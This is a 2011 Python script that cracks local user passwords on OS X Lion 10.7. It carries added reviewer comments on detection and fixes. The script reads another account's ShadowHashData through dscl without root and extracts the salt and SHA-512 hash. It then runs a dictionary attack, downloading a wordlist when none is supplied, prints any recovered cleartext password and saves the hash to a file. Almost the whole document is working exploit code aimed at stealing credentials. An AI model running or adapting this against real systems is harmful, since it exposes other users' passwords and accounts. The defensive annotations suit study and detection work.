defenceindepth

OS X Lion Password Cracker

Sep 18th, 2011
##########################################
#* OS X Lion 10.7 Password Cracker
#* UID 0 NOT required
#*
#* Usage:
#* python lion_crack.py [username] [dictionary]
#*
#*
#* Patrick Dunstan
#* Sep 18, 2011
#* http://www.defenceindepth.net
#*
###########################################
#
# Reviewer notes
# - Python 2 script: it imports urllib2 and concatenates byte strings before
#   hashing.
# - Flow: ask Directory Services (dscl) for a user's record, pull the
#   ShadowHashData attribute out of the output, slice a 4-byte salt and a
#   128-hex-character SHA-512 digest from it, then compare dictionary words
#   against that digest.
# - Defensive relevance: the script never elevates privileges, so the finding
#   is that an ordinary local account could read another account's password
#   hash material. Patching the OS is the fix; the dscl read of
#   /Search/Users/<name> by a non-admin process is the observable to look for
#   in process-execution telemetry.
# - The stored verifier is one pass of SHA-512 over salt + password, which is
#   cheap to test guesses against; that is why a plain wordlist is enough here.
#
# Star import: Popen and PIPE are the names the script relies on.
from subprocess import *
import hashlib
import os
import urllib2
import sys
from string import *

# Fallback wordlist, fetched over plain HTTP when no dictionary argument is
# supplied (see the urllib2.urlopen(link) call later in the script).
link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file
# Set to True when no username argument is given; the whoami output is used then.
defaultuser = False
# Target account short name; filled from argv[1] or from whoami.
username = ""

def check(password):
    """Test one candidate word against the recovered salted SHA-512 digest.

    Reads the module-level names salt_hex (raw salt bytes), hash (hex digest
    taken from ShadowHashData; it shadows the builtin of the same name) and
    username, so those must be assigned before the first call.

    On a match the cleartext is printed and the process exits with status 0;
    otherwise the function returns None.
    """
    # Lines starting with "#!" are wordlist comments, not candidates.
    if password.startswith("#!"):
        return

    # Single SHA-512 pass over salt + candidate, hex-encoded for comparison.
    candidate_digest = hashlib.sha512(salt_hex + password).hexdigest()
    print("Trying... " + password)

    if candidate_digest != hash:
        return

    print("Cleartext password for user '"+username+"' is : "+password)
    exit(0)

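# Target selection: argv[1] names the account; with no argument the account
# running the script is used.
if len(sys.argv) < 2:
    print("No username given. Defaulting to current user.")
    defaultuser = True
else:
    username = sys.argv[1]

# Commands are passed as argument vectors rather than shell strings, so the
# username below is never interpreted by a shell. The published version built
# the dscl command by string concatenation with shell=True, which lets shell
# metacharacters in argv[1] run as commands.
p = Popen(["whoami"], stdout=PIPE)
whoami = p.communicate()[0]

if defaultuser:
    username = whoami.rstrip()

# Directory Services lookup of the target's user record. This runs with the
# caller's own privileges; the rest of the script depends on the output
# containing the ShadowHashData attribute. For defenders, this process
# execution (dscl ... -read /Search/Users/<name>) is the event to alert on
# when it comes from a non-admin session.
p = Popen(["dscl", "localhost", "-read", "/Search/Users/" + username], stdout=PIPE)
dscl_out = p.communicate()[0]
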
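# Split the dscl output into lines. The published script stored this in a
# variable named "list", shadowing the builtin; a neutral name is used here.
dscl_lines = dscl_out.split("\n")

# The attribute value is on the line after the attribute name; spaces between
# the hex groups are removed. If the attribute appears more than once the last
# occurrence wins, as in the published script.
digest = None
for pos, item in enumerate(dscl_lines): # extract digest
    if "dsAttrTypeNative:ShadowHashData" in item and pos + 1 < len(dscl_lines):
        digest = dscl_lines[pos+1].replace(" ", "")

# Without this guard a missing attribute surfaced as a NameError further down.
# The attribute is absent when the lookup fails or the caller is not allowed
# to read it (presumably the case on patched systems - confirm against the
# vendor advisory).
if digest is None:
    sys.exit("No ShadowHashData attribute in dscl output for '" + username + "'.")

# The blob layout is recognised by its total length in hex characters. Each
# branch takes 8 hex characters of salt (4 bytes) and 128 hex characters of
# SHA-512 digest (64 bytes). "hash" shadows the builtin; the name is kept
# because check() and the save step read it.
if len(digest) == 262: # Out of box configuration
    salt = digest[56:64]
    hash = digest[64:192]
elif len(digest) == 314: # SMB turned on
    print("SMB is on")
    salt = digest[104:112]
    hash = digest[112:240]
elif len(digest) == 1436: # Lion Server
    # NOTE(review): as published, this hash slice starts at the salt offset,
    # unlike the other branches where it starts where the salt ends. Kept
    # unchanged.
    salt = digest[176:184]
    hash = digest[176:304]
elif len(digest) == 1492: # Lion Server with SMB
    salt = digest[224:232]
    hash = digest[232:360]
else:
    # Previously an unknown length left salt/hash unassigned and the script
    # died with a NameError on the next line.
    sys.exit("Unrecognised ShadowHashData length: " + str(len(digest)))

# NOTE(review): this prints credential material to stdout, where it can end
# up in terminal scrollback or logs.
print("SALT : " + salt)
print("HASH : " + hash)

# Despite the name, salt_hex holds the four raw salt bytes decoded from the
# eight hex characters in salt.
salt_hex = "".join(chr(int(salt[i:i+2], 16)) for i in range(0, 8, 2))
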
# Candidate source: a local dictionary file when argv[2] is present, otherwise
# the hard-coded online list. In both cases the invoking account's own name is
# tried as a password as well.
if len(sys.argv) != 3: # No dictionary file specified
    print("No dictionary file specified. Defaulting to hard coded link.")

    # NOTE(review): the list is fetched over plain HTTP with no integrity
    # check, and the request is visible on the network. A local, vetted
    # wordlist avoids both.
    remote_list = urllib2.urlopen(link) # Download dictionary file
    passwords = remote_list.read().split("\n")
    print("\nPassword list successfully read")

    passwords.append(whoami.rstrip())

    print("\nCracking...")
    for candidate in passwords:
        check(candidate)
else: # If dictionary file specified
    print("Reading from dictionary file '"+sys.argv[2]+"'.")
    check(whoami.rstrip())

    # One candidate per line; trailing whitespace and the newline are dropped.
    with open(sys.argv[2], "r") as wordlist:
        for line in wordlist:
            check(line.rstrip())

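# Save hash for later
# Reached only when no candidate matched, because check() exits the process on
# a match. The file holds salt + digest as hex, i.e. credential material, so it
# is created owner-read/write only instead of with the default umask
# permissions. The fchmod call covers the case where the file already existed.
print("\nSaving hash to "+username+".hash...")
fd = os.open(username+".hash", os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
os.fchmod(fd, 0o600)
with os.fdopen(fd, "w") as out:
    out.write(salt+hash)

print("\nPassword not found. Try another dictionary.\n")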